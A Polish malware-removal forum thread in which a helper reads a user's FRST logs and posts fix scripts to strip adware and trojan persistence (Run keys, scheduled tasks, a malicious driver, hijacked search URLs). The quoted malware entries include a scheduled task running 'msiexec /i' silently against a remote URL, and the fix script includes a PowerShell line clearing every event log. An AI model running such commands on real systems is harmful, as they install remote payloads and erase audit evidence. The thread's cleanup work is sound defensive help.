Adrian5432 Opublikowano 19 Lutego 2019 Zgłoś Udostępnij Opublikowano 19 Lutego 2019 Witam mam problem, w przegladarce Mozilla same zaczęły otwierac sie karty o nazwie thegoodcaster. Próbowałem standardowych rozwiazań z programami do malware, niestety nie zdąły egzaminu. Może ktoś mogł by mi pomóc? wrzucam log FRST FRST.txt Odnośnik do komentarza
jessica Opublikowano 20 Lutego 2019 Zgłoś Udostępnij Opublikowano 20 Lutego 2019 Infekcja jest widoczna w logu, ale potrzebne są jeszcze pozostałe logi FRST. przed skanem zaznacz: Additional.txt Shortcut.txt, jessi Odnośnik do komentarza
Adrian5432 Opublikowano 20 Lutego 2019 Autor Zgłoś Udostępnij Opublikowano 20 Lutego 2019 Ok już przesyłam, tylko nawet przy zaznaczonej opcji additional tworza sie tylko 2 pliki tekstowe. FRST i shortcut. Z góry dziekuje za pomoc FRST.txt Shortcut.txt Odnośnik do komentarza
jessica Opublikowano 20 Lutego 2019 Zgłoś Udostępnij Opublikowano 20 Lutego 2019 Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y. Otworzy się Notatnik - wklej do niego: Spoiler C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.lnk HKU\S-1-5-21-1196631564-2932191510-2940953793-1000\...\Run: [2310927] => C:\Users\Soska\AppData\Roaming\0kyaxiaqvp1\2mwa1rquts0.exe [1585072 2019-02-19] ( ) HKU\S-1-5-21-1196631564-2932191510-2940953793-1000\...\Run: [eyjqasr] => "C:\Users\Soska\hxdwxfve.exe" RemoveDirectory: C:\Users\Soska\AppData\Roaming\0kyaxiaqvp1 C:\Users\Soska\hxdwxfve.exe Startup: C:\Users\Soska\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\virstcec.lnk [2019-02-19] HKU\S-1-5-21-1196631564-2932191510-2940953793-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErUXs70UwlfkZ581yt5tAdnVwV5HqzqDqxuuurEvvLO2Gq2R6kiA-XD0d0C8sFvVx4majumAkGFAc5UUrDY7_2SsnT46onnFxlPPt2GxXbseh8c-yHKdKwbYVWHqRpNiotOg57gHjvbE0AJc8kdI7gLF5Cvcxtm7KjSiLpfpR8&q={searchTerms} SearchScopes: HKLM -> DefaultScope {ielnksrch} URL = SearchScopes: HKLM -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErUXs70UwlfkZ581yt5tAdnVwV5HqzqDqxuuurEvvLO2Gq2R6kiA-XD0d0C8sFvVx4majumAkGFAc5UUrDY7_2SsnT46onnFxlPPt2GxXbseh8c-yHKdKwbYVWHqRpNiotOg57gHjvbE0AJc8kdI7gLF5Cvcxtm7KjSiLpfpR8&q={searchTerms} SearchScopes: HKU\S-1-5-21-1196631564-2932191510-2940953793-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2019-02-19] () [Brak podpisu cyfrowego] <==== UWAGA HKLM\...\Run: [] => [X] HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA HKU\S-1-5-21-1196631564-2932191510-2940953793-1000\...\Run: [Chromium] => c:\users\soska\appdata\local\chromium\application\chrome.exe [829440 2017-02-15] (The Chromium Authors) RemoveDirectory: C:\ProgramData\Logic Cramble S2 icnuewv; C:\Windows\system32\icnuewv\tweecaen.exe [X] S2 Smart Monitoring; "\SmartData\jkglskjdfhj.exe" /srv [X] R1 6994BCAA5A43; C:\Windows\6994BCAA5A43.sys [493800 2019-02-19] (韵羽健康管理咨询(上海)有限公司 -> VxDriver) C:\Windows\6994BCAA5A43.sys S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X] S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X] 2019-02-19 18:23 - 2019-02-19 18:25 - 000015602 _____ C:\Windows\system32\findit.xml 2019-02-19 18:23 - 2019-02-19 18:23 - 000000000 ____D C:\ProgramData\Polygens 2019-02-19 18:21 - 2019-02-19 18:22 - 000000000 ____D C:\ProgramData\Logic Cramble 2019-02-19 18:21 - 2019-02-19 18:21 - 001895382 _____ C:\Users\Soska\AppData\Local\Hometom.bin 2019-02-19 18:20 - 2019-02-19 19:51 - 000000000 ____D C:\Windows\system32\icnuewv 2019-02-19 18:20 - 2019-02-19 18:21 - 000000550 _____ C:\Windows\Tasks\daZUxYAWxkQuTWt.job 2019-02-19 18:20 - 2019-02-19 18:20 - 007881728 _____ C:\Users\Soska\AppData\Local\agent.dat 2019-02-19 18:20 - 2019-02-19 18:20 - 002034984 _____ C:\Users\Soska\AppData\Local\Zoolex.tst 2019-02-19 18:20 - 2019-02-19 18:20 - 000493800 ____N (VxDriver) C:\Windows\6994BCAA5A43.sys 2019-02-19 18:20 - 2019-02-19 18:20 - 000278510 _____ C:\Users\Soska\AppData\Local\FlexFax.tst 2019-02-19 18:20 - 2019-02-19 18:20 - 000126464 _____ C:\Users\Soska\AppData\Local\noah.dat 2019-02-19 18:20 - 2019-02-19 18:20 - 000070896 _____ C:\Users\Soska\AppData\Local\Config.xml 2019-02-19 18:20 - 2019-02-19 18:20 - 000018432 _____ C:\Users\Soska\AppData\Local\Main.dat 2019-02-19 18:20 - 2019-02-19 18:20 - 000005568 _____ C:\Users\Soska\AppData\Local\md.xml 2019-02-19 18:20 - 2019-02-19 18:20 - 000000584 _____ C:\Windows\Tasks\QYuopVyvriCPHaS.job 2019-02-19 18:20 - 2019-02-19 18:18 - 001632256 _____ (TODO: <Company name>) C:\Users\Soska\AppData\Local\Zoolex.exe 2019-02-19 18:20 - 2019-02-19 18:18 - 001632256 _____ (TODO: <Company name>) C:\Users\Soska\AppData\Local\FlexFax.exe 2019-02-19 18:18 - 2019-02-19 18:18 - 000140800 _____ C:\Users\Soska\AppData\Local\installer.dat 2019-02-19 18:18 - 2019-02-19 18:18 - 000000000 ____D C:\Users\Soska\AppData\Roaming\0kyaxiaqvp1 2019-02-19 18:17 - 2019-02-19 18:17 - 000000003 _____ C:\Users\Soska\AppData\Local\wbem.ini 1601-01-03 21:26 - 1601-01-03 21:26 - 000073216 ____N (Microsoft Corporation) C:\Users\Soska\AeWteMpiUea.exe 1601-01-03 21:26 - 1601-01-03 21:26 - 000186368 ____N (Microsoft Corporation) C:\Program Files\HLUiFBNyOYuVy.exe 1601-01-03 21:26 - 1601-01-03 21:26 - 000073216 ____N (Microsoft Corporation) C:\Program Files\Common Files\deuNeyt.exe 2016-10-24 11:50 - 2016-10-24 11:50 - 000272384 _____ (Microsoft Corporation) C:\Users\Soska\AppData\Roaming\1d8f9911fea172f938a4d417ec13160e.exe 2019-02-19 18:20 - 2019-02-19 18:20 - 007881728 _____ () C:\Users\Soska\AppData\Local\agent.dat 2019-02-19 18:20 - 2019-02-19 18:20 - 000070896 _____ () C:\Users\Soska\AppData\Local\Config.xml 2019-02-19 18:35 - 2019-02-19 18:36 - 006161408 _____ () C:\Users\Soska\AppData\Local\dump007.dat 2019-02-19 18:20 - 2019-02-19 18:18 - 001632256 _____ (TODO: <Company name>) C:\Users\Soska\AppData\Local\FlexFax.exe 2019-02-19 18:20 - 2019-02-19 18:20 - 000278510 _____ () C:\Users\Soska\AppData\Local\FlexFax.tst 2019-02-19 18:21 - 2019-02-19 18:21 - 001895382 _____ () C:\Users\Soska\AppData\Local\Hometom.bin 2019-02-19 18:18 - 2019-02-19 18:19 - 000016368 _____ () C:\Users\Soska\AppData\Local\InstallationConfiguration.xml 2019-02-19 18:18 - 2019-02-19 18:18 - 000140800 _____ () C:\Users\Soska\AppData\Local\installer.dat 2019-02-19 18:20 - 2019-02-19 18:20 - 000018432 _____ () C:\Users\Soska\AppData\Local\Main.dat 2019-02-19 18:20 - 2019-02-19 18:20 - 000005568 _____ () C:\Users\Soska\AppData\Local\md.xml 2019-02-19 18:20 - 2019-02-19 18:20 - 000126464 _____ () C:\Users\Soska\AppData\Local\noah.dat 2019-02-19 18:18 - 2019-02-19 18:40 - 000722944 _____ () C:\Users\Soska\AppData\Local\sha.db 2019-02-19 18:27 - 2019-02-19 18:27 - 000174592 _____ () C:\Users\Soska\AppData\Local\TempQce34.exE 2019-02-19 18:22 - 2019-02-19 18:22 - 000032038 _____ () C:\Users\Soska\AppData\Local\uninstall_temp.ico 2019-02-19 18:17 - 2019-02-19 18:17 - 000000003 _____ () C:\Users\Soska\AppData\Local\wbem.ini 2019-02-19 18:20 - 2019-02-19 18:18 - 001632256 _____ (TODO: <Company name>) C:\Users\Soska\AppData\Local\Zoolex.exe 2019-02-19 18:20 - 2019-02-19 18:20 - 002034984 _____ () C:\Users\Soska\AppData\Local\Zoolex.tst HOSTS: Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW). Zrób nowe logi FRST. przed skanem zaznacz: Additional.txt Logu Addition.txt szukaj w folderze C:\Users\Soska\Downloads jessi Odnośnik do komentarza
Adrian5432 Opublikowano 20 Lutego 2019 Autor Zgłoś Udostępnij Opublikowano 20 Lutego 2019 Zrobiłem tak jak było w instrukcji i wysyłam logi. Jak narazie chyba wszystko wróciło do normy Addition.txt FRST.txt Shortcut.txt Odnośnik do komentarza
jessica Opublikowano 20 Lutego 2019 Zgłoś Udostępnij Opublikowano 20 Lutego 2019 Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y. Otworzy się Notatnik - wklej do niego: Spoiler Task: {3D83E7A3-901D-4274-9E92-251C2ABF632F} - System32\Tasks\snf => C:\ProgramData\Polygen\Polygen.exe <==== UWAGA Task: {52D2D139-D072-4B44-98B0-08038738C44F} - System32\Tasks\QYuopVyvriCPHaS => rundll32 "C:\Users\Soska\AppData\Local\Temp\nNxWrSPqpNrwsoEyy\CYXMGbcuXGPPliuU\gAsyVFa.dll",#1 /adp WIRF3EJRF4GKRF5WJRF4DKRF1ZIRF0KKRF7FKRF3BKRF2UJRF6EIRF1XIRF9PIRF6MJRF1UIRF5 /site_id 721.160122592_131566 <==== UWAGA Task: {5C7F14DE-47AC-4A48-98AB-AFCA0D43B8D8} - System32\Tasks\Update => C:\Users\Soska\AppData\Roaming\Microsoft\taskhostw.exe <==== UWAGA Task: {9FAA5757-D279-4811-AD2C-69E5861B3414} - System32\Tasks\{D7AF84F9-55A4-449B-4E1E-473FFEAA2DF3} => C:\Program Files\Common Files\deuNeyt.exe Task: {C403196C-5784-49C7-903C-DA80E8567BF4} - System32\Tasks\{C9747E93-B4A0-5296-15F9-4A926916721D} => "msiexec.exe" /i hxxps://refreshnerer711rb.info/Fv587VcC3.57X /q <==== UWAGA Task: {E207F58D-FAF2-44A1-8629-023648108556} - System32\Tasks\daZUxYAWxkQuTWt => rundll32 "C:\Users\Soska\AppData\Local\Temp\nNxWrSPqpNrwsoEyy\nGeBvHGpNdcwfUFg\XhhEltS.dll",#1 /adp RJRF0MJRF0DJRF1AJRF4LKRF8EJRF3GIRF0YIRF5LKRF2SJRF7WIRF7GKRF5BJRF0YIRF8HKRF3 /site_id 754 <==== UWAGA Task: {F17A1BCA-23D7-48C1-8410-4840B332743C} - System32\Tasks\snp => C:\ProgramData\Polygen\Polygen.exe <==== UWAGA C:\Program Files\Common Files\deuNeyt.exe RemoveDirectory: C:\ProgramData\Polygen C:\Users\Soska\AppData\Roaming\Microsoft\taskhostw.exe Task: {FB46AAC0-AAD1-49FF-9C9E-1D24604576F3} - System32\Tasks\Opera scheduled Autoupdate 2796787680 => C:\Users\Soska\AppData\Roaming\Microsoft\Windows\virstcec\ftdwvibr.exe () [Brak podpisu cyfrowego] RemoveDirectory: C:\Users\Soska\AppData\Roaming\Microsoft\Windows\virstcec ShortcutWithArgument: C:\Users\Soska\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% ShortcutWithArgument: C:\Users\Soska\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% ShortcutWithArgument: C:\Users\Soska\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% FirewallRules: [{E080C520-7E2D-42C5-99AF-71B434AA34D2}] => (Allow) C:\Users\Soska\AppData\Local\Temp\7zS0917\HPDiagnosticCoreUI.exe Brak pliku FirewallRules: [{4BC68413-84F4-4757-B7E9-0D4F3607EDC6}] => (Allow) C:\Users\Soska\AppData\Local\Temp\7zS0917\HPDiagnosticCoreUI.exe Brak pliku FirewallRules: [{D2F4292A-4A7B-43F7-9380-387C12406DE7}] => (Allow) C:\Users\Soska\AppData\Local\Temp\7zS0C99\HPDiagnosticCoreUI.exe Brak pliku FirewallRules: [{AD6A5CF5-F681-45E7-974E-A43247FA57E7}] => (Allow) C:\Users\Soska\AppData\Local\Temp\7zS0C99\HPDiagnosticCoreUI.exe Brak pliku HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA C:\Users\Soska\AppData\Roaming\WidModule C:\Users\Soska\AppData\Local\WhiteClick C:\Users\Soska\AppData\Local\Maurice EmptyTemp: Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW). Wg mnie po tym usuwaniu powinno być już OK. A jeśli nie będzie OK, to zrobisz nowe logi FRST. jessi Odnośnik do komentarza
Adrian5432 Opublikowano 20 Lutego 2019 Autor Zgłoś Udostępnij Opublikowano 20 Lutego 2019 niestety juz nie moge zrobic nic tym programem FRST, jak go włączam caly komp sie zawiesza. usunałem go ale jak wejde na strone zeby gom pobrac jest to samo, zawiesza sie przegladarka, inne strony działaja normalnie. Odnośnik do komentarza
jessica Opublikowano 20 Lutego 2019 Zgłoś Udostępnij Opublikowano 20 Lutego 2019 Pewnie antywirus przeszkadza. jessi Odnośnik do komentarza
Adrian5432 Opublikowano 20 Lutego 2019 Autor Zgłoś Udostępnij Opublikowano 20 Lutego 2019 Nie ma żadnego teraz, i z żadnej strony tylko tego programu nie można pobrać, inne chodzą bez zarzutu. Czy trzeba JesCze wprowadzać te poprawki czy już jakoś będzie chodził ? Wydaje się ze jest Ok Odnośnik do komentarza
jessica Opublikowano 20 Lutego 2019 Zgłoś Udostępnij Opublikowano 20 Lutego 2019 Cytat Czy trzeba JesCze wprowadzać te poprawki czy już jakoś będzie chodził ? Infekcja jest dalej, więc usunięcie tego jest absolutnie konieczne! Spróbuj ściągnąć, i użyć FRST w Trybie Awaryjnym (F8 przed startem Systemu) jessi Odnośnik do komentarza
Adrian5432 Opublikowano 20 Lutego 2019 Autor Zgłoś Udostępnij Opublikowano 20 Lutego 2019 Ok, udało się zrobić wszystko w trybie awaryjnym. Mam nadzieje ze teraz już wszystko Ok. Bardzo dziekuje za pomoc, sam bym sobie nie poradził ?? Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się